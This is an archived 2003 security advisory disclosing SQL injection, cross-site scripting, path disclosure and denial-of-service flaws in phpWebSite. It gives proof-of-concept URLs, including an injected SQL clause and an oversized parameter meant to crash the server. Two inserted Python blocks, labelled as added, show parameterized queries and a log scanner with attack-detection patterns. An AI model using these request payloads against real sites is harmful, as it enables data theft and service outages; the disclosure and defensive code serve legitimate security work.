phpWebSite SQL Injection & DoS & XSS Vulnerabilities

From: Lorenzo Hernandez Garcia-Hierro (novappcat_private)
Date: Sun Aug 10 2003 - 16:16:44 PDT


    phpWebSite SQL Injection & DoS & XSS Vulnerabilities
    ------
    PRODUCT: phpWebSite
    VENDOR: Appalachian State University
    VULNERABLE VERSIONS:
    
           - 0.9.x
           - 0.8.x
           - 0.7.x
           - And older versions.
    
    NOT VULNERABLE VERSIONS:
    
    - ?
    ---------------------
    
    Description:
    
    phpWebSite provides a complete web site content management system. Web-
    based administration allows for easy maintenance of interactive, 
    community-driven web sites.
    
    ---------------------------------------------
    |SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
    ---------------------------------------------
    
    I encountered SQL Injection vulnerabilities in some of the phpWebSite 
    modules, XSS (Cross-Site Scripting), Path Disclosures and a Denial 
    of Service attack.
    
    -------------
    | SQL       |
    | INJECTION |
    -------------
    
    I encountered SQL Injection vulnerabilities in the Calendar module, 
    active in default configurations, that allow you
    to execute SQL queries on the target server with the privileges of the 
    application user.
    
    When you send a specially crafted URL to the Calendar script you 
    get an SQL error like this:
    __________________________________________________________________
    DB Error: syntax error
    select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED 
    VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or 
    (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED 
    VALUE]0110)) and active=1 [nativecode=1064 
    ** You have an error in your SQL syntax near 
    '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or 
    (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
    ___________________________________________________________________
    
    This is an example of the error:
    ___________________________________________________________________
    DB Error: syntax error
    select * from mod_calendar_events where ((startDate >= 2003\0-10110 and 
    startDate <= 2003\0-10110) or 
    (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1 
    [nativecode=1064 
    ** You have an error in your SQL syntax near 
    '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110 
    and endDate ' at line 1]
    ___________________________________________________________________
    
    To trigger this, use this simple URL:
    
    http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
    
    This returns the SQL error. The error occurs when the query 
    includes the crafted value 2003[%00 = null]-1.
    You can design a successful query to get configuration values or 
    authentication data.
    I designed a URL that makes a successful (non-hostile) query:
    
    http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%29%20and%20active%3d1
    
    Without URL encoding, the injected value is:
    
    2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <= 
    20071205)) and active=1
    
    A little knowledge of SQL (in this case, MySQL) is needed to make a 
    successful attack.
    
    Other scripts of the Calendar module are affected by this hole: when 
    you send a crafted request, such as a + symbol in a critical URL variable 
    value, you get the "pure" SQL server error, and by looking at the error 
    pages you can imagine (I like this word) an SQL query to view private 
    information of the application, by trial and error.
    
    Other URLs to probe with are:
    
    http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=0&year=<
    
    http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=1%00&year=)SQL_INJECTION_FAKU
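    As an added illustration (not code from the advisory or from phpWebSite), the Python snippet below rebuilds the Calendar month query against a sqlite3 stand-in table: the vulnerable version glues the request strings into the SQL text, which is how a year value such as 2003%00-1 ends up inside the statement shown in the error output above, while the hardened version accepts only bounded integers and binds them as parameters. The query shape, the table rows and every column name other than startDate, endDate and active (which appear in the error output) are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for mod_calendar_events; only the column names startDate,
# endDate and active come from the advisory's error output, the rows are invented.
def make_demo_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("create table mod_calendar_events "
               "(id integer, startDate integer, endDate integer, active integer)")
    db.executemany("insert into mod_calendar_events values (?, ?, ?, ?)",
                   [(1, 20031105, 20031105, 1), (2, 20031120, 20031121, 1),
                    (3, 20031125, 20031125, 0), (4, 20031205, 20031205, 1)])
    return db

# Query shape reconstructed from the advisory's error message (an assumption):
# the date bounds are numbers built by concatenating year, month and day.
QUERY = ("select id from mod_calendar_events where "
         "((startDate >= {lo} and startDate <= {hi}) or "
         "(endDate >= {lo} and endDate <= {hi})) and active=1")

def vulnerable_month_query(year: str, month: str) -> str:
    """Unsafe pattern: raw request strings are glued into the SQL text, so a
    value such as '2003\\x00-1' (year=2003%00-1) lands inside the statement."""
    lo, hi = f"{year}{month}01", f"{year}{month}31"
    return QUERY.format(lo=lo, hi=hi)

def hardened_month_query(year: str, month: str):
    """Accept only bounded decimal integers and hand them to the driver as
    bind parameters; anything else (null bytes, spaces, keywords) is rejected."""
    if not (re.fullmatch(r"[0-9]{4}", year) and re.fullmatch(r"[0-9]{1,2}", month)):
        raise ValueError("year and month must be plain decimal digits")
    y, m = int(year), int(month)
    if not (1970 <= y <= 2100 and 1 <= m <= 12):
        raise ValueError("year or month out of range")
    lo, hi = y * 10000 + m * 100 + 1, y * 10000 + m * 100 + 31
    sql = QUERY.replace("{lo}", "?").replace("{hi}", "?")
    return sql, (lo, hi, lo, hi)

def active_event_ids(db: sqlite3.Connection, year: str, month: str) -> list:
    """Run the hardened query and return the ids of active events in that month."""
    sql, params = hardened_month_query(year, month)
    return [row[0] for row in db.execute(sql, params)]

if __name__ == "__main__":
    crafted = "2003\x00-1"                             # the advisory's year=2003%00-1
    print(repr(vulnerable_month_query(crafted, "")))   # null byte and "-1" inside the SQL
    try:
        hardened_month_query(crafted, "")
    except ValueError as e:
        print("rejected:", e)
    print(active_event_ids(make_demo_db(), "2003", "11"))  # [1, 2]
```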
    
    ------------------
    | XSS            |
    | vulnerabilities| 
    ------------------
    
    I encountered XSS security holes in some scripts of phpWebSite:
    
    http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
    
    http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
    
    http://[HOST]/[PATH]/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]&MMN_position=[X:X]
    
    http://[HOST]/[PATH]/index.php?module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
    
    
    Note that the Calendar, PageMaster and Fatcat modules are affected 
    COMPLETELY: all the script variables that are passed by URL are 
    affected by this too.
    
    When you access a hostile link with an XSS attack in those scripts, your 
    browser will execute the script commands.
    This can be used to steal cookies, authentication tokens and other 
    private information.
    If your browser is vulnerable to other holes (like MSIE ;-) you can 
    have more problems...
    
    XSS AT SQL ERRORS:
    
    If you send a crafted URL with XSS attack code to some of the 
    scripts that are vulnerable to SQL injection, the 
    XSS attack code will be executed in the error page.
    
    
    -----------------
    | PATH          |
    |  DISCLOSURES  |
    -----------------
    
    I tested this on Win2K (Windows 2000 Professional) with SP3 and these 
    versions:
    
    - Sambar Server 5.2 beta
    - PHP 4.2.3 running as ISAPI module
    - MySQL NT [normal service] 3.23.56
    - Include_Path to the pear folder of phpwebsite
    
    Sending this:
    
    http://127.0.0.1/index.php?module=calendar&calendar[view]=month&month=11&year=9
    
    (you can try other values and get the same result) you get this:
    
    Warning: localtime(): invalid local time in 
    C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
    
    Warning: localtime(): invalid local time in 
    C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
    
    <- more than fifty repetitions of this warning ->
    
    It is a strange error; I think that it only occurs on MS Windows 
    installations.
    Possibly it occurs when the PEAR library TimeZone.php script tries to 
    convert the local date to Unix timestamp format.
    
    ------------------
    | DENIAL OF      |
    |  SERVICE       |
    ------------------
    
    There is a DoS/Buffer Overflow attack in a script inside the Calendar 
    module that allows you to crash the host running
    the MySQL server and the phpWebSite scripts (they must be on the same 
    computer).
    
    This is a basic proof of concept for this vulnerability:
    
    http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=[VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
    
    An attack like this causes a global system crash, including the server 
    service and the MySQL service.
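    As an added example (not from the advisory or from phpWebSite), the scanner below runs over constructed access-log lines modelled on the request patterns from the SQL injection, XSS and DoS sections above and flags the indicators those requests share: a %00 null byte in a date or id parameter, SQL keywords or parentheses in it, a closing quote followed by a tag, and a value longer than the 4000 bytes noted for the crash. The parameter names come from the advisory's URLs; the log lines, addresses, the harmless <b> tag standing in for attack code, and the size threshold are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Combined-Log-Format lines modelled on the advisory's URLs; the
# addresses, timestamps and the harmless <b> tag standing in for XSS are invented.
DOS_YEAR = "91+" * 1400                      # about 4200 bytes, past the 4000 noted above
LOG_LINES = [
    '10.0.0.5 - - [10/Aug/2003:16:10:01 -0700] "GET /phpws/index.php?module=calendar'
    '&calendar[view]=month&month=11&year=2003 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Aug/2003:16:11:22 -0700] "GET /phpws/index.php?module=calendar'
    '&calendar[view]=day&year=2003%00-1&month= HTTP/1.1" 200 812',
    '10.0.0.9 - - [10/Aug/2003:16:12:03 -0700] "GET /phpws/index.php?module=calendar'
    '&calendar[view]=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29'
    ' HTTP/1.1" 200 900',
    '10.0.0.7 - - [10/Aug/2003:16:13:40 -0700] "GET /phpws/index.php?module=fatcat'
    '&fatcat[user]=viewCategory&fatcat_id=1%00+%22%3E%3Cb%3Exss%3C/b%3E HTTP/1.1" 200 700',
    '10.0.0.9 - - [10/Aug/2003:16:14:09 -0700] "GET /phpws/index.php?module=calendar'
    f'&calendar[view]=day&month=11&year={DOS_YEAR} HTTP/1.1" 500 0',
]

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Parameters the advisory shows being reflected into SQL or HTML.
WATCHED = {"year", "month", "day", "fatcat_id", "PAGE_id", "PDA_limit"}
SQL_RE = re.compile(r"\b(and|or|select|union|where)\b|[()=]", re.I)
TAG_RE = re.compile(r"""["']?>\s*<[a-z/!]""", re.I)
MAX_VALUE_LEN = 4000                         # threshold chosen from the advisory's figure

def scan_request(line: str):
    """Parse one log line and return the indicator names found in watched params."""
    m = LINE_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    hits = set()
    for name, values in params.items():
        if name not in WATCHED:
            continue
        for v in values:                     # parse_qs has already URL-decoded v
            if "\x00" in v:
                hits.add("null-byte")
            if SQL_RE.search(v):
                hits.add("sql-metachar")
            if TAG_RE.search(v):
                hits.add("html-injection")
            if len(v) > MAX_VALUE_LEN:
                hits.add("oversized")
    return {"ip": m["ip"], "status": m["status"], "hits": sorted(hits)}

def scan_log(lines):
    """Return only the requests that triggered at least one indicator."""
    return [r for r in map(scan_request, lines) if r and r["hits"]]
```

    The same checks map directly onto a mod_security rule set of the kind suggested in the Solutions below.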
    
    -----------------
    |   SoLuTiOnS   |
    -----------------
    
    1.- Be sure that the user of the phpWebSite database has only SELECT, 
    INSERT and UPDATE privileges, and only on the phpWebSite
        database.
    
    2.- Use the PHP function eregi_replace to prevent XSS attacks.
    
    3.- Turn php_error_flags to Off.
    
    4.- In addition, if you are using Apache, use an external module such as 
    mod_security.
    
    5.- If you are paranoid, don't use PHP, MySQL, Windows, Linux, 
    computers, TCP/IP, NetBIOS, games, ASP,
        Apache...... nothing! 
        WARNING ;-) : (paranoid solution...)
    
    -----------
    | CONTACT |
    -----------
    
    Lorenzo Hernandez Garcia-Hierro
    --- Computer Security Analyzer ---
    --Nova Projects Professional Coding--
    PGP: Keyfingerprint
    B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
    ID: 0x9C38E1D7
    **********************************
    www.novappc.com
    security.novappc.com
    www.lorenzohgh.com
    ______________________
    
    NSRG-20-7
    
    This archive was generated by hypermail 2b30 : Mon Aug 11 2003 - 10:49:22 PDT